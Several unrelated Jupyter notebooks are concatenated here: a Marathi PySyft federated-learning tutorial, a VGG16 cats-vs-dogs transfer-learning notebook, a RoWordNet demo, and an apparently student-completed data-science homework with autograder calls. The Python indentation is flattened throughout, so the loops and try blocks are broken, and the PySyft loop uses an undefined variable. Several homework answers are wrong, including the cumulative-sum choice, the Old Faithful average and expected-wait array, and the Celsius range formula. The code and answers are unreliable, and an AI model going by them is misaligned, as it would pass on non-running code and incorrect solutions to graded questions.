# - <NAME> - Github: [@LaRiffle](https://github.com/Laiffiff)
#
# अनुवादक/संपादक:
# - <NAME> - Twitter: [@krunal_wrote](https://twitter.com/krunal_wrote)· Github: [@Noob-can-Compile](https://github.com/Noob-can-Compile)
#
# + [markdown] lang="hi"
# आपण मागील धड्यात सापडलेला सँडबॉक्स वापरूया
# -
import torch as th
import syft as sy
sy.create_sandbox(globals(), verbose=False)
# + [markdown] lang="hi"
# नंतर एक डेटासेट शोधा
# -
boston_data = grid.search("#boston", "#data")
boston_target = grid.search("#boston", "#target")
# + [markdown] lang="hi"
# आपण एक मॉडेल आणि ऑप्टिमायझर(Optimizer) लोड करू
# +
n_features = boston_data['alice'][0].shape[1]
n_targets = 1
model = th.nn.Linear(n_features, n_targets)
# -
# येथे आपण फेडरेटेड डेटासेट `FederatedDataset` मधून प्राप्त केलेला डेटा टाकतो. त्या कामगारांकडे पहा ज्यांचा कडे डेटाचा भाग आहे.
# +
# Cast the result in BaseDatasets
datasets = []
for worker in boston_data.keys():
dataset = sy.BaseDataset(boston_data[worker][0], boston_target[worker][0])
datasets.append(dataset)
# Build the FederatedDataset object
dataset = sy.FederatedDataset(datasets)
print(dataset.workers)
optimizers = {}
for worker in dataset.workers:
optimizers[worker] = th.optim.Adam(params=model.parameters(),lr=1e-2)
# -
# आपण ते फेडरेटेड डेटालोडरमध्ये `FederatedDataLoader` ठेवले आणि पर्याय निर्दिष्ट केले
train_loader = sy.FederatedDataLoader(dataset, batch_size=32, shuffle=False, drop_last=False)
# आणि शेवटी आपण युगांवर पुनरावृत्ती करू. शुद्ध आणि स्थानिक PyTorch प्रशिक्षणाशी याची तुलना किती समान आहे हे आपण पाहू शकता!
for epoch in range(1, epochs + 1):
loss_accum = 0
for batch_idx, (data, target) in enumerate(train_loader):
model.send(data.location)
optimizer = optimizers[data.location.id]
optimizer.zero_grad()
pred = model(data)
loss = ((pred.view(-1) - target)**2).mean()
loss.backward()
optimizer.step()
model.get()
loss = loss.get()
loss_accum += float(loss)
if batch_idx % 8 == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tBatch loss: {:.6f}'.format(
epoch, batch_idx, len(train_loader),
100. * batch_idx / len(train_loader), loss.item()))
print('Total loss', loss_accum)
# # अभिनंदन !!! - समुदायात सामील होण्याची वेळ आली!
#
#
# हे नोटबुक ट्यूटोरियल पूर्ण केल्याबद्दल अभिनंदन! आपण याचा आनंद घेत असल्यास आणि एआय(AI) आणि एआय सप्लाय चेन (डेटा) च्या विकेंद्रित(Decentralized) मालकीच्या गोपनीयतेच्या संरक्षणाच्या दिशेने चळवळीत सामील होऊ इच्छित असाल तर आपण हे खालील प्रकारे करू शकता!
#
# ### Pysyft ला Github वर Star करा!
#
# आमच्या समुदायाला मदत करण्याचा सर्वात सोपा मार्ग म्हणजे फक्त गिटहब(GitHub) रेपो(Repo) तारांकित(Star) करणे! हे आम्ही तयार करीत असलेल्या छान साधनांविषयी जागरूकता वाढविण्यास मदत करते.
#
# - [Star PySyft](https://github.com/OpenMined/PySyft)
#
# ### आमच्या Slack मध्ये सामील व्हा!
#
#
# नवीनतम प्रगतीवर अद्ययावत राहण्याचा उत्तम मार्ग म्हणजे आमच्या समुदायामध्ये सामील होणे! आपण [http://slack.openmined.org](http://slack.openmined.org) येथे फॉर्म भरुन तसे करू शकता.
#
# ### एका कोड प्रोजेक्टमध्ये सामील व्हा!
#
# आमच्या समुदायामध्ये योगदानाचा उत्तम मार्ग म्हणजे कोड योगदानकर्ता बनणे! कोणत्याही वेळी आपण (PySyft GitHub Issues Page) वर जाऊ शकता आणि "Project" साठी फिल्टर करू शकता. हे आपण कोणत्या प्रकल्पांमध्ये सामील होऊ शकता याबद्दल विहंगावलोकन देणारी सर्व उच्च स्तरीय तिकिटे दर्शवेल! आपण एखाद्या प्रकल्पात सामील होऊ इच्छित नसल्यास, परंतु आपण थोडं कोडिंग करू इच्छित असाल तर आपण "good first issues" म्हणून चिन्हांकित गिटहब(GitHub) अंक शोधून आणखी "one off" मिनी-प्रकल्प(mini project) शोधू शकता.
#
# - [PySyft Projects](https://github.com/OpenMined/PySyft/issues?q=is%3Aopen+is%3Aissue+label%3AProject)
# - [Good First Issue Tickets](https://github.com/OpenMined/PySyft/issues?q=is%3Aopen+is%3Aissue+label%3A%22good+first+issue%22)
#
# ### दान करा
#
# आपल्याकडे आमच्या कोडेबेसमध्ये योगदान देण्यास वेळ नसल्यास, परंतु तरीही आपल्याला समर्थन द्यावयाचे असल्यास आपण आमच्या मुक्त संग्रहात बॅकर देखील होऊ शकता. सर्व देणगी आमच्या वेब होस्टिंग आणि हॅकॅथॉन आणि मेटअप्स सारख्या इतर सामुदायिक खर्चाकडे जातात!
#
# [OpenMined's Open Collective Page](https://opencollective.com/openmined)
|
examples/tutorials/translations/marathi/Part 07 - Federated Learning with Federated Dataset.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + id="EzeCCH4pNTIY" colab_type="code" outputId="eba28fd6-3ea2-4209-939b-6d7ce40cefd1" colab={"base_uri": "https://localhost:8080/", "height": 224}
# !wget https://download.microsoft.com/download/3/E/1/3E1C3F21-ECDB-4869-8368-6DEBA77B919F/kagglecatsanddogs_3367a.zip
# !unzip -q kagglecatsanddogs_3367a.zip
# + id="zOw7w2asNYN6" colab_type="code" outputId="44f03eac-bebf-4d23-9e97-e12dba4c8777" colab={"base_uri": "https://localhost:8080/", "height": 68}
import os
import numpy as np
import shutil
import glob
import warnings
warnings.filterwarnings('ignore')
cat_files = os.listdir('PetImages/Cat')
dog_files = os.listdir('PetImages/Dog')
for cat in cat_files:
src = os.path.join('PetImages/Cat',cat)
dst = os.path.join('PetImages/Cat','cat_'+cat)
os.rename( src,dst )
for dog in dog_files:
src = os.path.join('PetImages/Dog',dog)
dst = os.path.join('PetImages/Dog','dog_'+dog)
os.rename( src , dst )
cat_files = glob.glob('PetImages/Cat/*')
dog_files = glob.glob('PetImages/Dog/*')
print(len(cat_files),len(dog_files))
cat_train = np.random.choice(cat_files, size=3000, replace=False)
dog_train = np.random.choice(dog_files, size=3000, replace=False)
cat_files = list(set(cat_files) - set(cat_train))
dog_files = list(set(dog_files) - set(dog_train))
cat_val = np.random.choice(cat_files, size=1000, replace=False)
dog_val = np.random.choice(dog_files, size=1000, replace=False)
cat_files = list(set(cat_files) - set(cat_val))
dog_files = list(set(dog_files) - set(dog_val))
cat_test = np.random.choice(cat_files, size=1000, replace=False)
dog_test = np.random.choice(dog_files, size=1000, replace=False)
print('Cat datasets:', cat_train.shape, cat_val.shape, cat_test.shape)
print('Dog datasets:', dog_train.shape, dog_val.shape, dog_test.shape)
# #rm -r PetImages/ kagglecatsanddogs_3367a.zip readme\[1\].txt MSR-LA\ -\ 3467.docx
# + [markdown] id="RXwmVayNUY1q" colab_type="text"
# ### Splitting Train, Validation, Test Data
# + id="RVKEXBfqOCBN" colab_type="code" colab={}
train_dir = 'training_data'
val_dir = 'validation_data'
test_dir = 'test_data'
train_files = np.concatenate([cat_train, dog_train])
validate_files = np.concatenate([cat_val, dog_val])
test_files = np.concatenate([cat_test, dog_test])
os.mkdir(train_dir) if not os.path.isdir(train_dir) else None
os.mkdir(val_dir) if not os.path.isdir(val_dir) else None
os.mkdir(test_dir) if not os.path.isdir(test_dir) else None
for fn in train_files:
shutil.copy(fn, train_dir)
for fn in validate_files:
shutil.copy(fn, val_dir)
for fn in test_files:
shutil.copy(fn, test_dir)
# #!rm -r test_data/ training_data/ validation_data/
# + id="9NO8v9c37FFt" colab_type="code" outputId="2faafa1d-30d8-40ba-b527-48237fd45a16" colab={"base_uri": "https://localhost:8080/", "height": 51}
from keras.preprocessing.image import ImageDataGenerator, load_img, img_to_array, array_to_img
IMG_DIM = (150,150)
train_files = glob.glob('training_data/*')
train_imgs = [];train_labels = []
for file in train_files:
try:
train_imgs.append( img_to_array(load_img( file,target_size=IMG_DIM )) )
train_labels.append(file.split('/')[1].split('_')[0])
except:
pass
train_imgs = np.array(train_imgs)
validation_files = glob.glob('validation_data/*')
validation_imgs = [];validation_labels = []
for file in validation_files:
try:
validation_imgs.append( img_to_array(load_img( file,target_size=IMG_DIM )) )
validation_labels.append(file.split('/')[1].split('_')[0])
except:
pass
train_imgs = np.array(train_imgs)
validation_imgs = np.array(validation_imgs)
print('Train dataset shape:', train_imgs.shape,
'\tValidation dataset shape:', validation_imgs.shape)
# + id="uCiF0caJFpqk" colab_type="code" colab={}
# encode text category labels
from sklearn.preprocessing import LabelEncoder
le = LabelEncoder()
le.fit(train_labels)
train_labels_enc = le.transform(train_labels)
validation_labels_enc = le.transform(validation_labels)
# + [markdown] id="eF9tlYMGFKVm" colab_type="text"
# ### Image Augmentation
# + id="Nu39Vxd2DKd-" colab_type="code" colab={}
train_datagen = ImageDataGenerator(rescale=1./255,
zoom_range=0.3,
rotation_range=50,
width_shift_range=0.2,
height_shift_range=0.2,
shear_range=0.2,
horizontal_flip=True,
fill_mode='nearest')
val_datagen = ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow(train_imgs, train_labels_enc, batch_size=30)
val_generator = val_datagen.flow(validation_imgs, validation_labels_enc, batch_size=20)
# + [markdown] id="F48T5RXzF7RJ" colab_type="text"
# ### Keras Model
# + id="6DUkRSxBFT1B" colab_type="code" outputId="459c6f77-6b14-4289-cfc2-c8feaf1734c8" colab={"base_uri": "https://localhost:8080/", "height": 1108}
from keras.layers import Flatten, Dense, Dropout
from keras.applications import VGG16
from keras.models import Model
from keras import optimizers
input_shape = (150, 150, 3)
vgg = VGG16(include_top=False, weights='imagenet',input_shape=input_shape)
vgg.trainable = False
for layer in vgg.layers[:-8]:
layer.trainable = False
vgg_output = vgg.layers[-1].output
fc1 = Flatten()(vgg_output)
fc1 = Dense(512, activation='relu')(fc1)
fc1_dropout = Dropout(0.3)(fc1)
fc2 = Dense(512, activation='relu')(fc1_dropout)
fc2_dropout = Dropout(0.3)(fc2)
output = Dense(1, activation='sigmoid')(fc2_dropout)
model = Model(vgg.input, output)
model.compile(loss='binary_crossentropy',
optimizer=optimizers.RMSprop(lr=1e-4),
metrics=['accuracy'])
model.summary()
# + id="IzZWB0Spf627" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 824} outputId="bde31ee6-2d7a-408f-c2ee-8c152fa42952"
import pandas as pd
layers = [(layer, layer.name, layer.trainable) for layer in model.layers]
pd.DataFrame(layers, columns=['Layer Type', 'Layer Name', 'Layer Trainable'])
# + id="-imFB6g1H6MW" colab_type="code" outputId="1fd82f44-a4d3-45fb-d36a-784de9fc0175" colab={"base_uri": "https://localhost:8080/", "height": 2128}
from keras.callbacks import EarlyStopping, ModelCheckpoint
filepath="saved_models/vgg_transfer_learn_dogvscat.h5"
save_model_cb = ModelCheckpoint(filepath, monitor='val_acc', verbose=2, save_best_only=True, mode='max')
# callback to stop the training if no improvement
early_stopping_cb = EarlyStopping(monitor='val_loss', patience=7, mode='min')
callbacks_list = [save_model_cb,early_stopping_cb]
history = model.fit_generator(train_generator, steps_per_epoch=100, epochs=100,
validation_data=val_generator, validation_steps=50,
verbose=2,callbacks=callbacks_list)
# + [markdown] id="hS7j25QOULsG" colab_type="text"
# ### Model Performance
# + id="fx-Ud_eqIYco" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 308} outputId="06636480-1019-4b8a-b356-1828a212458a"
# %matplotlib inline
import matplotlib.pyplot as plt
f, (ax1, ax2) = plt.subplots(1, 2, figsize=(12, 4))
t = f.suptitle('Basic CNN Performance', fontsize=12)
f.subplots_adjust(top=0.85, wspace=0.3)
epoch_list = history.epoch
ax1.plot(epoch_list, history.history['acc'], label='Train Accuracy')
ax1.plot(epoch_list, history.history['val_acc'], label='Validation Accuracy')
ax1.set_xticks(np.arange(0, epoch_list[-1], 3))
ax1.set_ylabel('Accuracy Value')
ax1.set_xlabel('Epoch')
ax1.set_title('Accuracy')
l1 = ax1.legend(loc="best")
ax2.plot(epoch_list, history.history['loss'], label='Train Loss')
ax2.plot(epoch_list, history.history['val_loss'], label='Validation Loss')
ax2.set_xticks(np.arange(0, epoch_list[-1], 3))
ax2.set_ylabel('Loss Value')
ax2.set_xlabel('Epoch')
ax2.set_title('Loss')
l2 = ax2.legend(loc="best")
# + id="6H3SOuDPKrW5" colab_type="code" colab={}
if not os.path.exists('saved_models'): os.mkdir('saved_models')
model.save('saved_models/vgg_transfer_learn_dogvscat.h5')
# + id="U5MAybMyOlkU" colab_type="code" colab={}
|
Using_VGG_Transfer_Learning.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## This demo shows the basic components and operations of the RoWordNet.
#
#
#
#
# The first operation is to create a wordnet by using the internal resources.
import rowordnet
wn = rowordnet.RoWordNet()
# If you want to create a wordnet using your own resources you have to specify a ``filepath`` to the file and whether the file is binary or xml. You can also create an empty wordnet by setting the parameter ``empty`` to ``True``.
#
# Now that we have created a wordnet we can search for words. This action will return one or more synsets(the main component of a wordnet - see the synset/relation creation and editing for more details).
word = 'arbore'
synset_ids = wn.synsets(literal=word)
print("Total number of synsets containing literal '{}': {}".format(word, len(synset_ids)))
print(synset_ids)
# To print a detalied information of a synset we use the ``print_synset`` and provide the synset id.
synset_id = synset_ids[4]
wn.print_synset(synset_id)
# To obtain a synset object we simply use ``wn.synset()`` with the synset id as a paramater. We can also obtain the synset object by using ``wn()`` directly and passing the synset id as a parameter.
synset_object = wn.synset(synset_id)
print(synset_object)
synset_object = wn(synset_id)
print(synset_object)
# Every synset has a set of words called 'literals'. We can acces them by using the property ``literals`` of a synset.
literals = synset_object.literals
print("Synset with id {} has {} literals: {}".format(synset_object.id, len(literals), literals))
# As we have accesed the ``literals`` of a synset, we can acces and modify any property(WARNING: You can't modify the ``id``). Now let's try to acces and modify the ``definition`` property.
definition = synset_object.definition
print("Defitionion of the synset with id {}: {}".format(synset_object.id, definition))
new_definition = "This is a new defition"
synset_object.definition = new_definition
print("New definition of the synset with id {}: {}".format(synset_object.id, synset_object.definition))
# Function with ``wn.synsets()`` will return a list containing all the synset ids of the wordnet.
synsets_id = wn.synsets()
print("Total number of synsets: {} \n".format(len(synsets_id)))
# There are 4 types of parts of speech in RoWordNet : Nouns, Verbs, Adjectives and Adverbs. To filter the synsets you have to provide a part of speech to the ``pos`` parameter.
# +
from rowordnet import Synset
# return all noun synsets
synsets_id_nouns = wn.synsets(pos=Synset.Pos.NOUN)
print("Total number of noun synsets: {}".format(len(synsets_id_nouns)))
# return all verb synsets
synsets_id_verbs = wn.synsets(pos=Synset.Pos.VERB)
print("Total number of verb synsets: {}".format(len(synsets_id_verbs)))
# return all adjective synsets
synsets_id_adjectives = wn.synsets(pos=Synset.Pos.ADJECTIVE)
print("Total number of adjective synsets: {}".format(len(synsets_id_adjectives)))
# return all adverb synsets
synsets_id_adverbs = wn.synsets(pos=Synset.Pos.ADVERB)
print("Total number of adverb synsets: {}".format(len(synsets_id_adverbs)))
# -
# ### We continue with examples of navigating in the wordnet
#
# Synsets are linked by relations, encoded as directed edges in a graph. To see all the relations type between by accesing the ``relation_types`` property of the wordnet.
print("This wordnet contains {} relation types".format(len(wn.relation_types)))
# Every synset has a number of synsets that it points to (outbound relations) and a set of synsets that point to it (inbound relations). We can acces these synsets and the relations between them by using the functions ``outbound_relations`` and ``inbound_relations``, respectively. We can also access both the inbound and outbound relations of synset through ``relations`` function. Note that the ``relations`` function looses directionality as it is simply a concatenation of the inbound+outbound relations - it is used more as a convenience for printing rather than for operations or search in the word net.
# +
# print all outbound relations of a synset
synset_id = wn.synsets("tren")[0]
print("Print all outbound relations of synset with id {}".format(synset_id))
outbound_relations = wn.outbound_relations(synset_id)
for outbound_relation in outbound_relations:
target_synset_id = outbound_relation[0]
relation = outbound_relation[1]
print("\tRelation [{}] to synset {}".format(relation, target_synset_id))
# print all inbound relations of a synset
print("\nPrint all outbound relations of synset with id {}".format(synset_id))
for source_synset_id, relation in wn.inbound_relations(synset_id):
print("\tRelation [{}] from synset {}".format(relation, source_synset_id))
# get all relations of the same synset
relations = wn.relations(synset_id)
print("\nThe synset has {} total relations.".format(len(relations)))
# -
# To travel through the wordnet you use ``bfswalk()`` by providing a synset id as a starting location. This function ``yields`` a generator that can be further used to travel through the worndet.
# get a new synset
new_synset_id = wn.synsets("cal")[2]
# travel the graph Breadth First
counter = 0
print("\n\tTravel breadth-first through wordnet starting with synset '{}' (first 10 synsets) ..."
.format(new_synset_id))
for current_synset_id, relation, from_synset_id in wn.bfwalk(new_synset_id):
counter += 1
# bfwalk is a generator that yields, for each call, a BF step through wordnet
# you do actions with current_synset_id, relation, from_synset_id
print("\t\t Step {}: from synset {}, with relation [{}] to synset {}"
.format(counter, from_synset_id, relation, current_synset_id))
if counter >= 10:
break
# Being represented as a graph where the nodes are the synset ids and the edges are the relations between them, you can calculate the shortest distance between two synsets with ``shortest_path``. You can additionally provide a filter to this function and the shortest distance will be calculated following the specified relations.
# +
# shortest path unfiltered
synset1_id = wn.synsets("cal")[2]
synset2_id = wn.synsets("iepure")[0]
distance = wn.shortest_path(synset1_id, synset2_id)
print("List of synsets containing the shortest path from synset with id '{}' to synset with id '{}': "
.format(synset1_id, synset2_id))
print("{}".format(distance))
# shortest path filtered with 'hypernym' and 'hyponym' relations
relations = set(['hypernym', 'hyponym'])
filtered_distance = wn.shortest_path(synset1_id, synset2_id, relations)
print("\nList of synsets containing the shortest filtered path from synset with id '{}' to synset with id '{}': "
.format(synset1_id, synset2_id))
print("{}".format(filtered_distance))
# -
# There's a special set of relations(hyponym and hypernym) that create what's called the hypernym tree. This tree ilustrates the relations of type "is a". For instance, 'flower' is a 'plant'. We have provided several functions that interact with this tree like printing the lowest common ancestor of two synsets or print the path to root starting from a synset.
# +
# get the lowest common ancestor in the hypernym tree
synset1_id = wn.synsets("cal")[2]
synset2_id = wn.synsets("iepure")[0]
synset_id = wn.lowest_hypernym_common_ancestor(synset1_id, synset2_id)
print("The lowest common ancestor in the hypernym tree of synset {} and {} is {}".format(synset1_id, synset2_id, synset_id))
# get the path from a given synset to its root in hypermyn tree
synset_id = wn.synsets()[0]
print("\nList of synset ids from synset with id '{}' up to its root in the hypermyn tree: ".format(synset_id))
print("{}".format(wn.synset_to_hypernym_root(synset_id)))
|
jupyter/basic_operations_wordnet.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Homework 2: Arrays and Tables
# **Reading**: Textbook chapters [4](http://www.inferentialthinking.com/chapters/04/data-types.html) and [5](http://www.inferentialthinking.com/chapters/05/tables.html).
# Please complete this notebook by filling in the cells provided. Before you begin, execute the following cell to load the provided tests. Each time you start your server, you will need to execute this cell again to load the tests.
#
# Homework 2 is due Thursday, 9/7 at 11:59pm. Start early so that you can come to office hours if you're stuck. Check the website for the office hours schedule.
# You will receive an early submission bonus point if you turn in your final submission by Wednesday, 9/6 at 11:59pm. Late work will not be accepted unless you have made special arrangements with your (U)GSI or the instructor.
# +
# Don't change this cell; just run it.
import numpy as np
from datascience import *
from client.api.notebook import Notebook
ok = Notebook('hw02.ok')
_ = ok.auth(inline=True)
# -
# <font color="#E74C3C">**Important**: In this homework, the `ok` tests will tell you whether your answer is correct, except for Parts 1, 5, & 6. In future homework assignments, correctness tests will typically not be provided.</font>
# ## 1. Studying the Survivors
#
# The Reverend <NAME> was skeptical of <NAME>’s conclusion about the Broad Street pump. After the Broad Street cholera epidemic ended, Whitehead set about trying to prove Snow wrong. (The history of the event is detailed [here](http://www.ncbi.nlm.nih.gov/pmc/articles/PMC1034367/pdf/medhist00183-0026.pdf).)
#
# He realized that Snow had focused his analysis almost entirely on those who had died. Whitehead, therefore, investigated the drinking habits of people in the Broad Street area who had not died in the outbreak.
#
# What is the main reason it was important to study this group?
#
# 1) If Whitehead had found that many people had drunk water from the Broad Street pump and not caught cholera, that would have been evidence against Snow's hypothesis.
#
# 2) Survivors could provide additional information about what else could have caused the cholera, potentially unearthing another cause.
#
# 3) Through considering the survivors, Whitehead could have identified a cure for cholera.
# Assign survivor_answer to 1, 2, or 3
survivor_answer = 1
_ = ok.grade('q1_1')
# **Note:** Whitehead ended up finding further proof that the Broad Street pump played the central role in spreading the disease to the people who lived near it. Eventually, he became one of Snow’s greatest defenders.
# ## 2. Creating Arrays
#
# **Question 1.** Make an array called `weird_numbers` containing the following numbers (in the given order):
#
# 1. -2
# 2. the sine of 1.2
# 3. 3
# 4. 5 to the power of the cosine of 1.2
#
# *Hint:* `sin` and `cos` are functions in the `math` module.
# Our solution involved one extra line of code before creating
# weird_numbers.
import math
weird_numbers = make_array(-2,math.sin(1.2),3,pow(5, math.cos(1.2)))
weird_numbers
_ = ok.grade('q2_1')
# **Question 2.** Make an array called `book_title_words` containing the following three strings: "Eats", "Shoots", and "and Leaves".
book_title_words = make_array("Eats", "Shoots", "and Leaves")
book_title_words
_ = ok.grade('q2_2')
# Strings have a method called `join`. `join` takes one argument, an array of strings. It returns a single string. Specifically, the value of `a_string.join(an_array)` is a single string that's the [concatenation](https://en.wikipedia.org/wiki/Concatenation) ("putting together") of all the strings in `an_array`, **except** `a_string` is inserted in between each string
#
# **Question 3.** Use the array `book_title_words` and the method `join` to make two strings:
#
# 1. "Eats, Shoots, and Leaves" (call this one `with_commas`)
# 2. "Eats Shoots and Leaves" (call this one `without_commas`)
#
# *Hint:* If you're not sure what `join` does, first try just calling, for example, `"foo".join(book_title_words)` .
# +
with_commas = ", ".join(book_title_words)
without_commas = " ".join(book_title_words)
# These lines are provided just to print out your answers.
print('with_commas:', with_commas)
print('without_commas:', without_commas)
# -
_ = ok.grade('q2_3')
# ## 3. Indexing Arrays
#
# These exercises give you practice accessing individual elements of arrays. In Python (and in many programming languages), elements are accessed by *index*, so the first element is the element at index 0.
# **Question 1.** The cell below creates an array of some numbers. Set `third_element` to the third element of `some_numbers`.
# +
some_numbers = make_array(-1, -3, -6, -10, -15)
third_element = some_numbers[2]
third_element
# -
_ = ok.grade('q3_1')
# **Question 2.** The next cell creates a table that displays some information about the elements of `some_numbers` and their order. Run the cell to see the partially-completed table, then fill in the missing information in the cell (the strings that are currently "???") to complete the table.
elements_of_some_numbers = Table().with_columns(
"English name for position", make_array("first", "second", "third", "fourth", "fifth"),
"Index", make_array("0", "1", "2", "3", "4"),
"Element", some_numbers)
elements_of_some_numbers
_ = ok.grade('q3_2')
# **Question 3.** You'll sometimes want to find the *last* element of an array. Suppose an array has 142 elements. What is the index of its last element?
index_of_last_element = 141
_ = ok.grade('q3_3')
# More often, you don't know the number of elements in an array, its *length*. (For example, it might be a large dataset you found on the Internet.) The function `len` takes a single argument, an array, and returns the `len`gth of that array (an integer).
#
# **Question 4.** The cell below loads an array called `president_birth_years`. The last element in that array is the most recent birth year of any deceased president. Assign that year to `most_recent_birth_year`.
# +
president_birth_years = Table.read_table("president_births.csv").column('Birth Year')
most_recent_birth_year = president_birth_years[37]
most_recent_birth_year
# -
_ = ok.grade('q3_4')
# ## 4. Basic Array Arithmetic
#
# **Question 1.** Multiply the numbers 42, 4224, 42422424, and -250 by 157. For this question, **don't** use arrays.
first_product = 42 * 157
second_product = 4224 * 157
third_product = 42422424 * 157
fourth_product = -250 * 157
print(first_product, second_product, third_product, fourth_product)
_ = ok.grade('q4_1')
# **Question 2.** Now, do the same calculation, but using an array called `numbers` and only a single multiplication (`*`) operator. Store the 4 results in an array named `products`.
numbers = make_array(42,4224,42422424,-250)
products = numbers * 157
products
_ = ok.grade('q4_2')
# **Question 3.** Oops, we made a typo! Instead of 157, we wanted to multiply each number by 1577. Compute the fixed products in the cell below using array arithmetic. Notice that your job is really easy if you previously defined an array containing the 4 numbers.
fixed_products = numbers * 1577
fixed_products
_ = ok.grade('q4_3')
# **Question 4.** We've loaded an array of temperatures in the next cell. Each number is the highest temperature observed on a day at a climate observation station, mostly from the US. Since they're from the US government agency [NOAA](noaa.gov), all the temperatures are in Fahrenheit. Convert them all to Celsius by first subtracting 32 from them, then multiplying the results by $\frac{5}{9}$. Round each result to the nearest integer using the `np.round` function.
# +
max_temperatures = Table.read_table("temperatures.csv").column("Daily Max Temperature")
celsius_max_temperatures = np.round((max_temperatures - 32)*5/9)
celsius_max_temperatures
# -
_ = ok.grade('q4_4')
# **Question 5.** The cell below loads all the *lowest* temperatures from each day (in Fahrenheit). Compute the size of the daily temperature range for each day. That is, compute the difference between each daily maximum temperature and the corresponding daily minimum temperature. **Give your answer in Celsius!**
# +
min_temperatures = Table.read_table("temperatures.csv").column("Daily Min Temperature")
celsius_temperature_ranges = (celsius_max_temperatures - (min_temperatures-32)) * (5/9)
celsius_temperature_ranges
# -
_ = ok.grade('q4_5')
# ## 5. World Population
#
# The cell below loads a table of estimates of the world population for different years, starting in 1950. The estimates come from the [US Census Bureau website](http://www.census.gov/population/international/data/worldpop/table_population.php).
world = Table.read_table("world_population.csv").select('Year', 'Population')
world.show(4)
# The name `population` is assigned to an array of population estimates.
population = world.column(1)
population
# In this question, you will apply some built-in Numpy functions to this array.
# <img src="array_diff.png" style="width: 600px;"/>
#
# The difference function `np.diff` subtracts each element in an array by the element that preceeds it. As a result, the length of the array `np.diff` returns will always be one less than the length of the input array.
# <img src="array_cumsum.png" style="width: 700px;"/>
#
# The cumulative sum function `np.cumsum` outputs an array of partial sums. For example, the third element in the output array corresponds to the sum of the first, second, and third elements.
# **Question 1.** Very often in data science, we are interested understanding how values change with time. Use `np.diff` and `np.max` (or just `max`) to calculate the largest annual change in population between any two consecutive years.
largest_population_change = np.max(np.diff(population))
largest_population_change
_ = ok.grade('q5_1')
# **Question 2.** Describe in words the result of the following expression. What do the values in the resulting array represent (choose one)?
np.cumsum(np.diff(population))
# 1) The total population change between consecutive years, starting at 1951.
#
# 2) The total population change between 1950 and each later year, starting at 1951.
#
# 3) The total population change between consecutive years and 1950, starting at 1951.
# Assign cumulative_sum_answer to 1, 2, or 3
cumulative_sum_answer = 3
_ = ok.grade('q5_2')
# ## 6. Old Faithful
#
# **Important**: In this question, the `ok` tests don't tell you whether or not your answer is correct. They only check that your answer is close. However, when the question is graded, we will check for the correct answer. Therefore, you should do your best to submit answers that not only pass the tests, but are also correct.
#
# Old Faithful is a geyser in Yellowstone that erupts every 44 to 125 minutes (according to [Wikipedia](https://en.wikipedia.org/wiki/Old_Faithful)). People are [often told that the geyser erupts every hour](http://yellowstone.net/geysers/old-faithful/), but in fact the waiting time between eruptions is more variable. Let's take a look.
# **Question 1.** The first line below assigns `waiting_times` to an array of 272 consecutive waiting times between eruptions, taken from a classic 1938 dataset. Assign the names `shortest`, `longest`, and `average` so that the `print` statement is correct.
# +
waiting_times = Table.read_table('old_faithful.csv').column('waiting')
shortest = 44
longest = 125
average = (44+125)/2
print("Old Faithful erupts every", shortest, "to", longest, "minutes and every", average, "minutes on average.")
# -
_ = ok.grade('q6_1')
# **Question 2.** Assign `biggest_decrease` to the biggest decrease in waiting time between two consecutive eruptions. For example, the third eruption occurred after 74 minutes and the fourth after 62 minutes, so the decrease in waiting time was 74 - 62 = 12 minutes. *Hint*: You'll need an array arithmetic function [mentioned in the textbook](https://www.inferentialthinking.com/chapters/04/4/arrays.html#Functions-on-Arrays).
biggest_decrease = abs(min(np.diff(waiting_times)))
biggest_decrease
_ = ok.grade('q6_2')
# **Question 3.** If you expected Old Faithful to erupt every hour, you would expect to wait a total of `60 * k` minutes to see `k` eruptions. Set `difference_from_expected` to an array with 272 elements, where the element at index `i` is the absolute difference between the expected and actual total amount of waiting time to see the first `i+1` eruptions. *Hint*: You'll need to compare a cumulative sum to a range.
#
# For example, since the first three waiting times are 79, 54, and 74, the total waiting time for 3 eruptions is 79 + 54 + 74 = 207. The expected waiting time for 3 eruptions is 60 * 3 = 180. Therefore, `difference_from_expected.item(2)` should be $|207 - 180| = 27$.
difference_from_expected = abs(np.cumsum(waiting_times) - (60 * 272))
difference_from_expected
_ = ok.grade('q6_3')
# **Question 4.** If instead you guess that each waiting time will be the same as the previous waiting time, how many minutes would your guess differ from the actual time, averaging over every wait time except the first one.
#
# For example, since the first three waiting times are 79, 54, and 74, the average difference between your guess and the actual time for just the second and third eruption would be $\frac{|79-54|+ |54-74|}{2} = 22.5$.
average_error = np.mean(abs(np.diff(waiting_times)))
average_error
_ = ok.grade('q6_4')
# ## 7. Tables
#
# **Question 1.** Suppose you have 4 apples, 3 oranges, and 3 pineapples. (Perhaps you're using Python to solve a high school Algebra problem.) Create a table that contains this information. It should have two columns: "fruit name" and "count". Give it the name `fruits`.
#
# **Note:** Use lower-case and singular words for the name of each fruit, like `"apple"`.
# +
# Our solution uses 1 statement split over 3 lines.
from datascience import *
fruits = Table().with_columns("fruit name",
make_array("apple", "orange", "pineapple"),
"count", make_array(4, 3, 3))
fruits
# -
_ = ok.grade('q7_1')
# **Question 2.** The file `inventory.csv` contains information about the inventory at a fruit stand. Each row represents the contents of one box of fruit. Load it as a table named `inventory`.
inventory = Table.read_table("inventory.csv")
inventory
_ = ok.grade('q7_2')
# **Question 3.** Does each box at the fruit stand contain a different fruit?
# Set all_different to "Yes" if each box contains a different fruit or to "No" if multiple boxes contain the same fruit
all_different = "Yes"
all_different
_ = ok.grade('q7_3')
